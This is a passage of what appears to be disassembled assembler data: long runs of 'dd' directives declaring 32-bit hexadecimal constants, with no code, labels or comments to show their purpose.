		dd 5A1518D2h, 51D59462h, 3D6694ECh, 1FAE3D5Bh, 55969E8h
		dd 0F08A87D6h, 9D9F57BAh, 22CAA86h, 8084E522h, 0A84D053Ch
		dd 73AE9307h, 0D5241E7Ch, 1701F495h, 944A534Dh,	2250A39Bh
		dd 36619F01h, 8E4B4D12h, 0E9A21205h, 768DFDCFh,	80BA7933h
		dd 24D15602h, 29D9903Dh, 0A906ADE5h, 0C58B494Dh, 3C598EA1h
		dd 0F4AE5550h, 5F17BAC2h, 0BC889695h, 240B11DDh, 3914B2AFh
		dd 45709ED4h, 0AF8B82FAh, 0FF50AC0Eh, 0C7EFFCE0h, 0E13C4B94h
		dd 2BE8D931h, 0AED8A579h, 5AF1AAECh, 0F821BFACh, 5800C8E0h
		dd 26B20FB8h, 31E9EC41h, 62B93C40h, 0B2C2F9C1h,	0F5141D58h
		dd 957698A0h, 0AA25BAFDh, 1E5E6045h, 492C55A0h,	2671805Fh
		dd 4913191Ch, 24693C8Ah, 3371A718h, 9002A60Dh, 11CC824Ah
		dd 8074B740h, 9150155Eh, 0A03E9557h, 11515E97h,	7A039561h
		dd 0A11CA119h, 3603492Eh, 1122644Ah, 487B080h, 477F97E3h
		dd 0A901C12Fh, 0AAF4FDE3h, 7B820F60h, 6D8B07DEh, 0A93C6F83h
		dd 425532DEh, 0D00E011Ah, 0C5A6C2ABh, 222DED26h, 9ADC9C0Ch
		dd 0C16D7038h, 18F4348h, 640790EAh, 1524E004h, 0D38197A0h
		dd 4964DE64h, 58D8447h,	0D2592917h, 0C65C7A01h,	3B7C3847h
		dd 8963AE80h, 259C0112h, 96DC12CAh, 2BF4B48h, 9D00AAF4h
		dd 8F2849h, 0FEF219ECh,	0AF40A3F7h, 0A250D40Ch,	87232BE2h
		dd 81537916h, 0D9258BB8h, 3D99F54h, 3802FA19h, 40A466EAh
		dd 8BAAAFAh, 562C4673h,	17F1CB1Fh, 0D4C62945h, 5DF0A31Dh
		dd 0D5B4025h, 7B7D6C54h, 3D7C4B7Bh, 7BCA8A74h, 41C5516Fh
		dd 17735779h, 724D7E99h, 60535657h, 7974A787h, 24C6A809h
		dd 49252862h, 351D6C20h, 205335E4h, 20ECE0FAh, 6228FEFFh
		dd 441F6415h, 0A70840CDh, 1BE9CDA0h, 2B04A036h,	0D95E2820h
		dd 6561908h, 440A8F83h,	8C620268h, 0EE76A574h, 0E70AA04Ah
		dd 0ABDC01F1h, 122642C1h, 8B060608h, 0E72592CDh, 0E2A55182h
		dd 8817C644h, 0F39DBD09h, 0DC17AF10h, 3501A328h, 163A0FFFh
		dd 0A4C0E5DDh, 75291EB9h, 0DC545C61h, 42A021C5h, 48022921h
		dd 0D51498A8h, 60EBE55Ah, 7AE0AF5Dh, 35F4B79Ah,	0AE8CD3BEh
		dd 4A0CE62Ch, 721C1AADh, 646FB676h, 758FA4B4h, 5B130089h
		dd 2B380265h, 0A9053590h, 971D330Ch, 4B72B546h,	0B3FA499Fh
		dd 0C4C32C5Eh, 0E0C81056h, 0C0FE1AB0h, 0CAF91B9Eh, 7FAB5D4Eh
		dd 604AEAB5h, 0FD60C113h, 0FB5FAF8Bh, 6784FCF1h, 85A0FE50h
		dd 3907EB12h, 684288C0h, 0BF9A7789h, 1331E768h,	107AF40Bh
		dd 0A5CE0FDAh, 61431CA4h, 8BE0AFAEh, 8152B3B3h,	7D2C27ABh
		dd 0D85EA590h, 577E93F8h, 0E62864h, 0D61BADC5h,	0DD808365h
		dd 0E21222F3h, 1AAEECDDh, 417AB383h, 0B240DFA5h, 1918EB00h
		dd 32287177h, 0C30F2FC7h, 0C218AACDh, 52D4E028h, 18BC8DE6h
		dd 92A05831h, 9604B432h, 57B63F32h, 87127AEBh, 115887C9h
		dd 0BE45C7C3h, 336677h,	0C3D7D4E5h, 6672F087h, 0FD62017Dh
		dd 0CB094174h, 5B91A0D3h, 5BB979C9h, 0EAD45961h, 0AD0858FAh
		dd 0E71E6F8Ah, 80AC9AAAh, 0D4188B0Ch, 0C5D6F97Ah, 42C129BFh
		dd 0BE41BD8Dh, 2992612h, 3461C081h, 70DFF268h, 7209389Dh
		dd 0D9E24F93h, 0F7F5BBA5h, 8244DFABh, 0D0F83BE5h, 9344AD27h
		dd 26297509h, 0D105BB04h, 0F0E2EB3Bh, 9155C16Dh, 0EE94046Ah
		dd 272E8E5Eh, 1497020h,	396B3390h, 0BAF9096Ch, 5ABCD17Dh
		dd 7AC1C94Eh, 864487E1h, 0F2F96D4Dh, 9B7C06F0h,	0C020F9Ah
		dd 15DE26ABh, 8C443FB5h, 0F09C80B6h, 96401B04h,	2195F822h
		dd 6ED37D81h, 7DB74955h, 0D650C1FEh, 29007F0h, 82702C03h
		dd 0CDD6BE12h, 3206658Ch, 7726E820h, 31DA62BDh,	14328BABh
		dd 0A4C1BB4Ch, 98D9D16Bh, 7DC128A9h, 84A16F39h,	0B1C96577h
		dd 0DF540422h, 41D14484h, 3AC00229h, 9FFDF437h,	6494D97Fh
		dd 0EF35FABEh, 283E53A1h, 45240569h, 44707F18h,	0AFC68C67h
		dd 26082318h, 0A0ED7AEh, 382BF107h, 43E649D8h, 9AF01C41h
		dd 1F0B6AB3h, 4A357820h, 2D19A5DDh, 0BB881C0Ch,	0DEAE0F2Bh
		dd 75B25443h, 968CF0ADh, 0AF523B00h, 9BB1C028h,	142D0FBh
		dd 4460D243h, 3BB40A25h
		dd 776882F9h, 9086818h,	589E4234h, 83A3F5A3h, 0B3A24590h
		dd 0C5634048h, 0EA084E23h, 2BA4B06h, 8D552E02h,	55D2F495h
		dd 9AC5838h, 0E2FF0A8h,	0A9C73676h, 600E780Bh, 0B2874814h
		dd 56B67FE0h, 0D2670FC5h, 6208A90Bh, 290C0BDh, 8E025230h
		dd 55B1800Ch, 62D12441h, 0C6D552D4h, 0CC2FA85Fh, 0EAD43B64h
		dd 83ACE370h, 59E0E8BFh, 0A90AEF1h, 5A09DBCh, 50DCFC6Fh
		dd 398C273Bh, 18B71361h, 6D425D2Ah, 0C6D1D34Ch,	2A11EB41h
		dd 4808BFABh, 6F9D0BBCh, 0C6B21C07h, 9FF965D4h,	75E06C5Ch
		dd 0DCC0A6C1h, 0C3E00A92h, 852A21E2h, 9B4238AEh, 0CCE200BFh
		dd 6C5C8DEBh, 0AD5FF05h, 0CB5C1F34h, 5626385Fh,	0CB88685h
		dd 6F68090Eh, 4A831F18h, 0F4BFCBF9h, 3FDA0E2h, 3190954Ah
		dd 5D60D626h, 1FF567FCh, 60B3DF8Eh, 33C1C606h, 36ED9B4Bh
		dd 0DD223C83h, 2C853BFDh, 18A04FEBh, 1482180h, 9F10411Fh
		dd 0ADE60Eh, 0E2CFFFABh, 0E281ABBEh, 48A2B01h, 15495CACh
		dd 2AD1BA2Fh, 0F23123ABh, 542A454Fh, 63155A9h, 0A324ADh
		dd 78E78ABCh, 0B495BECEh, 0B260F86Ch, 0AAD45784h, 8C9756B0h
		dd 89FEC933h, 9D88B837h, 0D7E82574h, 86FE8CD0h,	76340920h
		dd 95CD5769h, 42D4E152h, 77B598A8h, 0AF319DB0h,	6C5D8C8Bh
		dd 0FA3CFDB1h, 30660E10h, 0DFAF51C7h, 0C7C10D49h, 4E026164h
		dd 0F4A4579h, 541230AEh, 3DB8EA14h, 0A4CD8EF5h,	57690A2Bh
		dd 0BE1AE7A9h, 0E34FC390h, 1B142554h, 64510BBDh, 0DCAE8800h
		dd 63D877EFh, 0E15A849Bh, 7CA69816h, 0A7FFFE7Ah, 64022Ch
		dd 4314718Eh, 0D1A36109h, 3C5AB3FAh, 8B0A7915h,	0F1A8FE39h
		dd 0A35BDD27h, 22F56853h, 93E05FF0h, 8D4713F8h,	2420A832h
		dd 0CCF703DFh, 2CF940D3h, 37EA58A1h, 155FE75Ah,	6BAE0C55h
		dd 0AF2BA6A2h, 8AB954CBh, 0C33F152Ah, 2210F8Ch,	0B014B844h
		dd 42575DDh, 0AAB7556Ch, 0BD5274BDh, 56EA32CBh,	5C3090F5h
		dd 2BFC7158h, 5A75B693h, 8D9E2097h, 808A4EAFh, 26ED6165h
		dd 0EB20EEDAh, 9999CC0Ah, 0C1D6A9BBh, 0B46559C4h, 0D161931h
		dd 8356569Bh, 300153A4h, 0FB640062h, 0B9709045h, 0D7809FAAh
		dd 13034F89h, 40A2F0A4h, 0B9C4E86h, 1F52AABh, 10C10ADDh
		dd 3C5DBFE0h, 3A90BFF9h, 788024EDh, 0F8E6C19Ah,	32898CAEh
		dd 0DC15981Bh, 6E2E7B9h, 861B0C46h, 85E54C01h, 68E408ACh
		dd 62CBAAA9h, 0C7783AB5h, 0DE9F301Fh, 28276515h, 85672D5h
		dd 0DBE420AFh, 0FC27672h, 0DA35EF8Fh, 13352E3Dh, 0F9E6C04Bh
		dd 0A9B3F23Ah, 3C6A6208h, 2FA17AE5h, 87E100F0h,	0C1941003h
		dd 4042589Bh, 9312484h,	250E4A71h, 8B8156FDh, 72B40801h
		dd 0B34EE085h, 0E128E9D3h, 28A76FBCh, 0BE40FEAAh, 0C6D64055h
		dd 49DA5D38h, 0BFE21D21h, 2F90F798h, 290AF27Eh,	0A4D02555h
		dd 7CF037AEh, 0C6C3A8D0h, 2D0F14Dh, 15A036ADh, 8DC81C1Ch
		dd 4991D241h, 0A0CC3423h, 2146E5FFh, 23810159h,	0B1785D2h
		dd 0A8D3E134h, 755FB975h, 0B83699E8h, 0DFDB34DEh, 0FFEF2C0Ah
		dd 5A16CCC2h, 0F1D5D6D5h, 0A8E2842Ah, 0E0495644h, 8BAA06Eh
		dd 224B2Bh, 0FC75C2D6h,	0C7D1B447h, 0C65CAE93h,	0D1FBE029h
		dd 510357BCh, 9305FDAh,	91069A2Fh, 429472B4h, 68A50C4Ch
		dd 73A5C39Dh, 0D057E10Ch, 3282677Ah, 2C1B4E5h, 5BCA945Fh
		dd 0C9ACC155h, 0FE62337Ch, 1078FC62h, 950B1535h, 98DE32F2h
		dd 9EBB574Eh, 4A300102h, 0DAF59718h, 0AC1E385Eh, 0F87481F6h
		dd 0B7068562h, 0AA5085D5h, 5D1EC83Eh, 81434712h, 0C9FD4341h
		dd 169A5710h, 2AF45DA7h, 0C40A2C34h, 405D3A08h,	0E40CEA89h
		dd 2D8461E0h, 0E5D2E190h, 50B634B2h, 1E0C6ED2h,	0D3670517h
		dd 0FC6F20Ch, 0A492EE07h, 2C1459C0h, 0C7229BACh, 77C496h
		dd 74C92AFAh, 0C57BD511h, 0B151E65h, 88828D56h,	9575D717h
		dd 273CE8CFh, 0F4A6635Ah, 407455C8h, 8D5897FFh,	15432DF8h
		dd 0F87F7DA8h, 8E018EB9h, 5D979ADCh, 174064B1h,	71F705FFh
		dd 2557A130h, 0C48E1860h, 6940AF00h, 0BB0931E8h, 14FB3BB0h
		dd 0FA6325D6h, 0EA2590DCh, 0C6528701h, 0A294BB3Bh, 2C326714h
		dd 0A24C1D1Dh, 2195B3C6h, 4DC11C18h, 9D5476A6h,	640BF694h
		dd 0FF7C6045h, 0FED7D1E7h, 7A66BA5Eh, 5FF2FD55h, 0A6E451F8h
		dd 0F0397934h, 0AC4D0455h, 0D5C9E55Eh, 82A8D75h, 5CA4A2F9h
		dd 0BBE6B3BBh, 40BE214Eh, 0DEBEC331h, 27EB39Bh,	0D8E14AB9h
		dd 1BE060B8h, 65DF3538h, 64C6D2F8h, 0C2DC800Ah,	5BD2087Bh
		dd 57D6A6FDh, 703F89EBh, 40997E31h, 0AE5BB351h,	5D070E57h
		dd 3DA0610Ch, 0F915EF5Ch, 0D8D8F4A6h, 8AD03A1Ch, 9B59D7DEh
		dd 15F39452h, 998F5187h, 0FA1232C1h, 32AD1534h,	0FB3E9761h
		dd 266FE41Ch, 6793FFB4h, 0AF22A90h, 6C16A596h, 603CFB97h
		dd 9F6CAD48h, 47B23039h, 0D4C2B7E5h, 82A27F66h,	59F4109Ch
		dd 0E08194C1h, 505DAFF0h, 65762C35h, 54827941h,	0BB84FB47h
		dd 4C1F21E1h, 44C0E05Eh, 0EAFF07Fh, 0CBFFDFAEh,	95FA80C9h
		dd 4555D7C3h, 0FF953E19h, 910E2C1h, 0F6B272EBh,	29B1AD94h
		dd 6E50FBD6h, 99EACCBEh, 1E8A5585h, 284A14A0h, 53982A23h
		dd 7B352D0Eh, 4B445B9Eh, 0F4F3AD51h, 0CEE2256h,	28719E40h
		dd 0A6932E6Fh, 56173CC1h, 0CD5A875Eh, 7BD33790h, 977A0B9h
		dd 0CC3E3E95h, 867DB785h, 0F92F2948h, 6117B820h, 6E269CD5h
		dd 0BFB3588Bh, 28A3C7F6h, 7552551Eh, 2AF9BD19h,	0D86F948Ah
		dd 0A87FD243h, 0D86C15F2h, 0D1BD0DC1h, 911ED4EFh, 88B47846h
		dd 0C3520817h, 9C3BCDA1h, 101589CDh, 0A2AC0623h, 176729ABh
		dd 91E05077h, 525F6C5Ch, 0C5252750h, 572153C3h,	0A955A5D6h
		dd 80C67C0Bh, 0A874D4FAh, 14C20AAh, 7A7E19ECh, 95E23008h
		dd 1145BA0Ah, 8674EE28h, 0AE86CCDCh, 5FB17D3Eh,	0DD7E3E6Ch
		dd 9ACC0BE4h, 207C9F7Fh, 1103615Bh, 1F46044Dh, 9D857E68h
		dd 1066E50Eh, 2C6E0DDEh, 709A0E64h, 8144D01Ah, 1DF13AE8h
		dd 0D20C1E6Dh, 553156BAh, 0AA0C3D5h, 0E8AA4B54h, 0B3C8BA93h
		dd 0B0BF1332h, 7C77EF8Ah, 0FFC871D5h, 0D56849B2h, 0D44274DDh
		dd 0EC90AE87h, 0A060DB98h, 0CF0F974Eh, 54127464h, 0C5C2DFFAh
		dd 680DF109h, 5CFDA1FBh, 65C90712h, 9B554977h, 8BDCB84Ah
		dd 0D6D9D083h, 0F62516CFh, 88E1060Fh, 462690E0h, 0A896ADF3h
		dd 0E906A372h, 7F201E57h, 21DFBA23h, 506228F6h,	2299485Eh
		dd 0FA40777Bh, 2AEBF6D5h, 5D42CC01h, 8B010214h,	250EEA4Ah
		dd 2AF41EC5h, 0AF03C018h, 0EEF0A9B4h, 887F09BAh, 5BFC0334h
		dd 0E77F17FCh, 717FE056h, 0C8A23BA7h, 0A4B8EB34h, 122CCF4Bh
		dd 7286EABFh, 6F65BFF3h, 7A0E97FEh, 0D66E7E20h,	17FC82FFh
		dd 32886359h, 0B50257E6h, 0E368962Dh, 6E51BB5Ch, 0D31558DAh
		dd 0A48A7515h, 0B648077Fh, 7121EFADh, 10A72006h, 0BB0BE77Eh
		dd 2894569Eh, 6665ACA4h, 0A536B5D2h, 2EAF40C0h,	480B098Dh
		dd 2C140D5Bh, 0BC324334h, 0B883422Eh, 5F8A9470h, 0FFC9A2D7h
		dd 0C9478096h, 248A809Fh, 16B310BCh, 86F3AED5h,	9D441053h
		dd 61E8B001h, 0FDD23E80h, 0C09229E7h, 9EA40BFCh, 8A7C0601h
		dd 0C9B80EF1h, 8496A020h, 274599FDh, 0D5153EA6h, 1C0E7C3h
		dd 0D215C586h, 463AD86Ch, 2E3B8DA2h, 9D8501EAh,	716A6CDAh
		dd 0F5E43AFFh, 74B0B32Ah, 180E7255h, 0D49380A5h, 299730E8h
		dd 0F853F0A4h, 8C555B17h, 80FC3D77h, 78EC3E03h,	8CCECD95h
		dd 0BC20A3C0h, 2FF0268Bh
		dd 0C9D00C86h, 0C1A2BA8Ah, 188DF5D6h, 80176662h, 0A044326Dh
		dd 28A03D74h, 2D40B25Dh, 5A762969h, 0B4D942DEh,	0D62D85E0h
		dd 89C70AC5h, 0A858EB97h, 0E966CCB4h, 0C552D0Ah, 410816B6h
		dd 2C20DCB4h, 1231FAEh,	0A0191014h, 0C18B4C37h,	0A067FBF5h
		dd 81AA534Ch, 0BFDD017Dh, 7CC8C883h, 3AB28014h,	0A052AC8Dh
		dd 64330B2h, 822C60D8h,	0E7ED07C0h, 238CBF02h, 0F89A0BAFh
		dd 4F2A218Bh, 415A2902h, 7ED47748h, 8033181Ch, 1AC15420h
		dd 3310150h, 48F0F2E4h,	0A0416E52h, 13015D26h, 0A615632Dh
		dd 114A4BDAh, 0DE55EC52h, 28A0CBBCh, 3AA45495h,	0B23C75B3h
		dd 62C594BEh, 8A5A99Fh,	0BA77814Ch, 7E9C37A8h, 830890A7h
		dd 2DE68173h, 38224041h, 4A20B1F0h, 6302ADBBh, 90BC07Dh
		dd 0B13B4F34h, 64505592h, 0E3A1EC01h, 6AB3144Bh, 28B040h
		dd 1B68DFA7h, 33F5A039h, 0B190194Ch, 81310341h,	0FEDB5420h
		dd 89CAE825h, 55DF9E81h, 4B50AF46h, 8B5AE042h, 0FBDDE106h
		dd 0C4689E92h, 92DB0651h, 0E983723Fh, 0CD0DAC25h, 0F658C44h
		dd 8AC74110h, 0AB9E7758h, 173AA7D1h, 1F2E6AB8h,	0F6EC8DF4h
		dd 0D7470B9Fh, 0D100E3h, 918A539Dh, 0BC3BCF42h,	0E4C403C6h
		dd 78D28159h, 82FA4121h, 3A99FBCAh, 71BE0FD4h, 7D657BEFh
		dd 79688DA0h, 4CA8D7D6h, 78B1AB43h, 75C8E2D6h, 6037CB5Dh
		dd 0B11C650Ah, 0D03C8E9Fh, 11CE5119h, 20B2CEDh,	198F4F4Bh
		dd 0EE835C2h, 8283229Bh, 0DE798CE2h, 0FB371B09h, 0AD9599E9h
		dd 0C51B0741h, 0B2431BC2h, 0E95FFE35h, 0E2FF2069h, 4C7D83A7h
		dd 324BDF40h, 85E97DCh,	19E62A98h, 0FA768AA3h, 460222D6h
		dd 0B2B300EDh, 0D20C0903h, 464B5EA7h, 45409B2Ch, 0A38C5277h
		dd 44943ACEh, 0EB3868A1h, 2C84B4E8h, 70E6A1B8h,	50030A3Dh
		dd 27E3B654h, 0FC977E83h, 8825CCC0h, 79835743h,	0C91C0A1Ah
		dd 0A6501416h, 0C1541968h, 18E240C0h, 546A0261h, 0C86D3D8Ah
		dd 37D40149h, 200D3818h, 0C57E5F95h, 0F7E826B9h, 0E0302271h
		dd 4D0184DFh, 394EBC97h, 0BCE3AB8Eh, 71A8A2B3h,	670BFD7Eh
		dd 672DF51Eh, 6E9017FEh, 1CDCBA84h, 4DF9E51Dh, 0C7C0C094h
		dd 4BA5C706h, 2E779C4Ah, 2C422405h, 82A45898h, 8EBB6F8Fh
		dd 0A905361Fh, 85ED8311h, 481CD662h, 5DF4ABCBh,	58CFB4E9h
		dd 0C3077231h, 0FC4E4E0Fh, 0C13A174h, 0DB4297D4h, 0CBC23190h
		dd 75DFB3D5h, 5060F471h, 0A4C4009Ch, 48614DC2h,	62280AFDh
		dd 9B32389h, 0FAA5BB05h, 3340FDEFh, 0BEF87452h,	0DC3670D8h
		dd 9FA5282Dh, 6B17E1A4h, 0C3EFFD8h, 367D5B79h, 5995F841h
		dd 502419BEh, 28CD90Ah,	0EB7B5D63h, 0F0F04940h,	0E60B09C5h
		dd 6A647E88h, 24A95B3h,	750735ECh, 23C87FF9h, 7F10D898h
		dd 7C8E10B0h, 0DB410248h, 3305F69h, 394FD7F6h, 0D6D3B7F7h
		dd 7FD8F537h, 3D90D902h, 0CA27F2C8h, 38EF28B8h,	0DEEB3947h
		dd 0DDCE8CE7h, 0A0BC07C6h, 0A4C201E7h, 3BB87E4Dh, 258B70Ah
		dd 76EAAF8Bh, 568D09F5h, 0DCC15B64h, 0EBB7C6C2h, 0BC329641h
		dd 34F2E2AAh, 0A461D6AAh, 4A215B75h, 3F33A57h, 3DA3F876h
		dd 37385D31h, 0FAC4EBAh, 44CD21DEh, 5DE50438h, 3FE59DE8h
		dd 0B7E812A3h, 0E2F9214Dh, 45B8030Eh, 31EA21h, 2861EBFFh
		dd 8A3DDA4Ch, 0E551A111h, 74BD2AEBh, 94511299h,	0CE0A71D0h
		dd 0D2F4A009h, 5F944C4Ah, 3218C085h, 4CC54681h,	150B45DCh
		dd 0B754FC5Eh, 495986C5h, 9DB2552Ah, 0A1B9B8FAh, 9920C4E2h
		dd 83C30654h, 312F3EB8h, 4238F76h, 8D7677D3h, 3F77B017h
		dd 0BA51EC60h, 0B05A8071h, 9821C082h, 4F2484BAh, 0D1A5F522h
		dd 102A0523h, 62D0915Ah, 16F5D035h, 0B7B9173Ch,	0E5EBF3DDh
		dd 12A985B9h, 0A6150171h, 0CAACA75Ah, 808FB06Eh, 1A72CDA0h
		dd 81013DD2h, 946DBF4h,	8A6E158h, 43124AAFh, 5DA3214Dh
		dd 0B77ED879h, 4FE980D8h, 2A750B2Eh, 0D9443BFFh, 0E85B297h
		dd 9C2C0297h, 671C6014h, 26CCD1CAh, 29A28BA4h, 2C11FD32h
		dd 8A9CDC62h, 504A2E4Bh, 826ACD75h, 132EF499h, 0C2D72ECAh
		dd 0C67497DDh, 0F3107EDh, 6B22818Eh, 19BECD4h, 4AE7E94Fh
		dd 419B817Ah, 0DF7503C1h, 271061E2h, 315C566Eh,	258EFC6Eh
		dd 27C2B965h, 0F32E61DDh, 7BD707C1h, 0F08B7A8h,	6804B5Dh
		dd 1CB15368h, 2FE13398h, 82C4AD7Eh, 3F7589AAh, 0DA57D449h
		dd 1B34744Dh, 1B854AB3h, 46DF12AEh, 0FCC15266h,	0E53D76DAh
		dd 9E9EF8FBh, 0B43E7076h, 7F0A331h, 639C8666h, 71748888h
		dd 945AB2F0h, 0A8E82B6h, 0C52A50D9h, 58F4155Ah,	949B579Bh
		dd 8588EB2Fh, 0B537FAAFh, 9A67BA92h, 0C8EAA0BBh, 68E450Eh
		dd 6FB1E28h, 5D630A54h,	0E4524C59h, 234D7F18h, 46FA528Dh
		dd 466A17AEh, 3C0F4852h, 0B5FFDC1Fh, 9404D72Dh,	0FB6CCF16h
		dd 65867CCh, 0EB362D3Eh, 6F912365h, 61E41263h, 0BE1FE83h
		dd 0F3EF9515h, 0CFFB5B01h, 465D0199h, 0C845E3E3h, 0B884E4CBh
		dd 0B265517Dh, 5C5532Eh, 0DD8687A7h, 0A0CA3211h, 0B11246D4h
		dd 0C8132E4Bh, 27C603E7h, 6014145Ch, 3FD4E076h,	75ED5E65h
		dd 99E5374h, 0D28E0B5h,	18FE5676h, 0D6BEF3BEh, 0F5D6836Dh
		dd 0E064DE38h, 9C804651h, 0AA432613h, 83B19295h, 0A0DC61A8h
		dd 0DE20A858h, 5363760Ch, 69C936E3h, 0E1F55F87h, 41704442h
		dd 0C4D66BA1h, 0B791228Bh, 0EDE4DCF9h, 241052EFh, 0B63604F4h
		dd 78543B8Fh, 0F80A0B34h, 0C42C388Fh, 93644E1Ah, 1A34AEC5h
		dd 175E9A04h, 7FA6E7h, 0CE20DA2h, 37110709h, 7D8CEE34h
		dd 0BBF30C42h, 576A46A8h, 0AE23950Ch, 34CAD95Ch, 41A89FD2h
		dd 274B106Eh, 561F835h,	0E133E7C4h, 40DAE56Eh, 605A55B5h
		dd 0B6F9268Eh, 0FE61A43Ch, 8286317Bh, 0B507115Bh, 20CE0E7h
		dd 0B03FE822h, 0BCDA9184h, 31B4BFE3h, 741293F0h, 0A3D2543Dh
		dd 7B383BB8h, 0CAABA54Fh, 781B5F2Dh, 66ECEAD4h,	756F8AAFh
		dd 2356AAE9h, 0E341AA21h, 4024B511h, 0C576AB8h,	4D68557Ah
		dd 96FAD5Ah, 7F2E9C09h,	0A87BDC09h, 6A08F190h, 59BDBFC8h
		dd 0A4279839h, 0B4E1F406h, 0BEE9959Bh, 8CD58343h, 0D7E6DC0Fh
		dd 341166E5h, 22A282D1h, 0E82B595Fh, 0D116185Eh, 1F65B872h
		dd 0FB5AF51Ah, 427D7B98h, 0DB4C2601h, 134FAAD3h, 42494743h
		dd 0AD11EC11h, 46F889Fh, 4890904h, 8D232109h, 57D128D7h
		dd 0CF44B33Bh, 0B0917688h, 0A84896E7h, 0EA79E0FFh, 81662D4Bh
		dd 0F366914Ah, 0D2B4513Fh, 0ACCB365h, 0AEB3555h, 2ADF4781h
		dd 6E5DA8A0h, 3BBD828Fh, 351622AAh, 154A1F4Eh, 0F091B47Fh
		dd 0ACABF655h, 0FAA24028h, 0B876DBF8h, 0C1C35A3Bh, 8068FCE6h
		dd 309B32Eh, 7CEFA89Ch,	9D59553h, 0DF870114h, 2C8CF51h
		dd 4F62E08Bh, 0CEFC0BBFh, 0A530BD3Eh, 0C76EE63Ah, 0C32EA34h
		dd 2F8AD180h, 8F8BEBA2h, 5D12AB13h, 7F554127h, 15D612E9h
		dd 77FF8E0Ch, 4129EAAh,	9E0998AAh, 0D4C74982h, 980C041Dh
		dd 0EA21556h, 8A365FA3h, 1484ED75h, 23040242h, 39E81A88h
		dd 3562074Eh, 0FA71C3ACh, 710DE1DFh, 6BF0F571h,	220F7AE2h
		dd 90A5278h, 0FA08E5C9h, 5F5FCC4Dh, 0A385E169h,	0ECB478FDh
		dd 5FEA8C2Ah, 0E189422Dh, 0F2ABC4EFh, 0B4B775C3h, 0B514E45Dh
		dd 0D3263930h, 74D11976h, 84ABA8D2h, 9C9845FEh,	0C8E5878Ah
		dd 1C7552F8h, 64B4F1Bh,	0A43A005Ah, 17D8D8Ah, 5F06A391h
		dd 9E2D6486h, 0D7C4760Dh, 0EF85277h, 4D01DF7Eh,	291E482Fh
		dd 535438FEh, 0E0A16349h
		dd 0A0A05D39h, 81701680h, 8C458124h, 0FE733A1Fh, 27E817FCh
		dd 5D628BDDh, 17DF384Ch, 723458BEh, 0B278A1A8h,	0A244F9B5h
		dd 5485BFCDh, 8A2F1FD9h, 0B51EBA7Bh, 0BA5D10EFh, 0F82E0948h
		dd 0A33B154h, 0F4A703F3h, 62CF6E99h, 3E520F0h, 4D378884h
		dd 0FE7F03FFh, 8D44383Dh, 420231F3h, 98AA8741h,	28579C0Bh
		dd 9A7C61A9h, 2FBF50C2h, 54C08A60h, 0B0ABE808h,	1A4C9324h
		dd 448AAC91h, 33038919h, 42962281h, 0BE804C93h,	4DAAEF29h
		dd 3E9870E2h, 0ADE10DF8h, 7CFC6148h, 5F7DCDF4h,	77102069h
		dd 0B6718C8h, 10FCFF34h, 522B6722h, 0C639C0h, 0CA120150h
		dd 131D120h, 0D74F8470h, 28B9525Ch, 640FF170h, 7D3024EAh
		dd 0F4B8AD6Ah, 413D1391h, 0F7C39684h, 2F9176F6h, 9D85CBF3h
		dd 9596456h, 29B825AAh,	0A621E8FAh, 8B0B8C36h, 99725Ch
		dd 0A8662FECh, 0D146CFCBh, 0AAE801C7h, 0EB0573A0h, 9C77DA8Ah
		dd 8154E0A3h, 241F18A5h, 145484E0h, 0E3CEB6B0h,	52111B72h
		dd 529CFF0Ah, 1FDB00DCh, 8A80C1F4h, 4D46DE3Bh, 0D4CCCF23h
		dd 0CC46B80h, 0F41C36E9h, 0F2BE41E8h, 3064D35h,	0E45CE35Bh
		dd 0DA0A913Bh, 35B8E2F8h, 3571B8BEh, 7D674CC0h,	2D6DA0E6h
		dd 0A2841A16h, 1046FF80h, 2E7953B3h, 1D4B6157h,	9A2E424Fh
		dd 0A3178E02h, 4A9D0D42h, 0CA63E9Dh, 0C4874012h, 537264FAh
		dd 0D0C4FD47h, 4E622390h, 682FC553h, 0A2112990h, 0B3C0AE4Ah
		dd 2EA4F475h, 21D66D0h,	0F95F3060h, 405F4266h, 0D1D5F0Ch
		dd 0C8E88206h, 4681A429h, 0AE2A43F0h, 3565F097h, 0B0E11F8Ah
		dd 7ACB02EAh, 0D7960881h, 2B503640h, 0B91B2F8Fh, 0A88A4853h
		dd 20088930h, 0A4395827h, 33A469F8h, 9E2E3788h,	0FDB1FDC7h
		dd 8087D9E1h, 7F89FF5Ah, 0CA1DE209h, 2748FADh, 0E7704F04h
		dd 46E90C06h, 0DEFF6C0h, 50FDE83Bh, 0F9F5939h, 0EAFBF624h
		dd 0EBBDAD43h, 142E0EADh, 1FE15054h, 8859B048h,	0D8FBDD86h
		dd 4A387E77h, 0B1156A52h, 0F2139240h, 82A1182Dh, 0CC408A8Bh
		dd 0EEACAAA2h, 63F222C0h, 897D1C92h, 96DCB0B8h,	6DAFB19h
		dd 3C252A55h, 0A6D1797Eh, 71B363E0h, 60360CBAh,	9E9F1570h
		dd 4546FB4Dh, 50E9F12Eh, 0BACD2BA0h, 57599B0Eh,	29A71DFCh
		dd 2E4ED6D7h, 17548CB8h, 0EFB1CA43h, 0BACBA150h, 4427E941h
		dd 0E681EBAFh, 0AFACC14Eh, 0E4A8777h, 59CEB395h, 40D6CD83h
		dd 221D82A2h, 9B780776h, 7E636A2Bh, 0CB014054h,	81C24AB6h
		dd 94724AC1h, 4A76F892h, 0C8D05402h, 8C70C2BBh,	0CA5C2BEDh
		dd 0DA444CCEh, 0E20BE438h, 173B0856h, 5022A242h, 0E58EC758h
		dd 670611D9h, 2587B0CEh, 32B90A90h, 26B53203h, 0A73C97FCh
		dd 49C56912h, 0F853A327h, 8A2C62FBh, 0C3E8B4D7h, 9BF348Ah
		dd 50E37910h, 9A152949h, 0AC5E04E4h, 2C0BEB94h,	0DFE49076h
		dd 8382C60h, 0D6347986h, 891889D1h, 0C6A85A34h,	6841523Ch
		dd 0A0DE282Ch, 0BACC910Ch, 2614462Dh, 0BA164C1Ch, 8B4E879Eh
		dd 0B5E1B4Bh, 7FC65AAh,	0CA7677BDh, 95B53071h, 0A2169804h
		dd 82AC4720h, 21B68776h, 8ABFBEC2h, 0F371FE50h,	0B479758Eh
		dd 55393075h, 0D568DE6Eh, 874E3DA4h, 8FEDB3AEh,	3D7170EDh
		dd 569CB379h, 0BB7266D7h, 0BCAB3BCFh, 55AA7C08h, 8DA6A192h
		dd 0AD51E093h, 0A0BC9A5Fh, 5D206378h, 8B963632h, 35304A0Dh
		dd 0E9BE4B1h, 44570A4Ah, 0E64489F4h, 0D8A562A4h, 28026737h
